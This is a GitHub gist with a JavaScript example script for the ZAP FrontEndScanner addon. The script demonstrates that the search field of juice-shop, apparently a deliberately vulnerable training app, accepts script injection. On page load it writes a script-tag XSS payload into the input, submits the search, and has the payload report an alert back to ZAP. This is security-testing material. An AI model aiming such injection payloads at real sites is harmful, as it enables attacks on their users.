Created
August 7, 2018 15:18
-
-
Save Pamplemousse/669e5bf9a3399331c7b8443ed766b3bf to your computer and use it in GitHub Desktop.
An example of script to be run with ZAP's FrontEndScanner addon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Proof that the `input` element for search in the juice-shop | |
| * is injectable and can lead to an XSS vulnerability. | |
| */ | |
| // Make this function global so it can be called from anywhere in a page. | |
| window.reportXSSToZap = function (element) { | |
| frontEndScanner.reportAlertToZap({ | |
| confidence: frontEndScanner.zapAlertConstants.CONFIDENCE_HIGH, | |
| description: "An XSS vulnerability has been found on the targeted page.", | |
| evidence: `the field ${serialize(element)} can be injected with the payload: '${element.value}'`, | |
| name: "XSS vulnerability", | |
| risk: frontEndScanner.zapAlertConstants.RISK_HIGH | |
| }); | |
| // Utility function to display an element with it's CSS selectors. | |
| function serialize(element) { | |
| var result = element.tagName; | |
| if (element.id) { | |
| result += '#' + element.id; | |
| } | |
| if (element.classList) { | |
| element.classList.forEach(className => { | |
| result += '.' + className; | |
| }); | |
| } | |
| return result; | |
| } | |
| } | |
| // The input field appears later than this script in the page, so let's wait | |
| // for it to be present. | |
| window.onload = function () { | |
| window.injectableField = document.getElementsByTagName('input')[0]; | |
| const payload = '\<script\>reportXSSToZap(injectableField)\</script\>'; | |
| injectableField.value = payload; | |
| injectableField.dispatchEvent(new Event('change')); | |
| document.getElementById('searchButton').click(); | |
| }; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment